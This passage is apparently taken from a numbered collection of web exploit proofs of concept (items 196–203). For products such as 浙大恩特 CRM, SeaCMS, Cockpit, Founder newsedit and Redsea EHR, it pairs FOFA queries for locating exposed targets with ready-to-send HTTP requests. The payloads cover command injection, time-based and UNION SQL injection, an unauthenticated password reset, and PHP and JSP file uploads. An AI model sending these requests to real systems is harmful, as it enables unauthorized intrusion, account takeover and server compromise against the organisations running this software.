Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 Unified Authentication Platform Password Reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL Injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV Command Injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit System assetsmanager_upload Endpoint File Upload

1. Run the PoC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

FOFA:title="Authenticate Please!"
3. Upload using the session cookie obtained above:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL Injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) Omnimedia News Editing System binary SQL Injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 System AccountEdit Arbitrary File Upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. Redsea (红海云) EHR PtFjk File Upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
